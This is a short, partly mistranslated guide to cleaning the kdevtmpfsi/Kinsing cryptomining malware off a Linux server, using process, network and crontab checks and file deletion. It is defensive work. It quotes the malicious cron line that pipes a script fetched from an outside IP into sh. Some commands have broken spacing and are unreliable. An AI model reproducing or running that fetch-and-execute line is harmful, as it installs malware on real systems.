Virus Name: kdevtmpfsi
Status: the CPU full, leading online service downtime.
Pirates of the picture is, the process takes to be true.
1、# top
View occupancy cpu, cpu occupancy find the process of finally kdevtmpfsi
2、# netstat -natp
According to the above process name to view links within the network and tcp exception, see strange ip, find out for foreign ip, estimated to be the host of the race back door
In this case, the timing of the probability of large mining script in your crontab inside.
crontab -l, abnormal regular tasks, * * * * * wget -q -O - http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1
Check this process running
systemctl status 3127
systemctl status 3127
ps aux | grep Kinsing
ps aux | grep kdevtmpfsi
kill -9 3127
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf / var / tmp / kinsing remember this daemon file should be deleted, can not find it, you can also use this command
find / -name kdevtmpfsi
find / -name kinsing
Into the / var / spool / cron see if there is a timing-related tasks in the implementation of the Trojans any deleted restart next crontab
Follow-up to its source, find bugs, banning access ip, not normal ip. Source code download.
Use clamav do a comprehensive scan of the entire Linux, determine the infected file and delete it.
Find daemon variant file name.
delete all
find / -name "kinsing*" | xargs rm -rf
至此杀毒工作基本进入尾声。后面几天观察服务器服务,进程是否异常。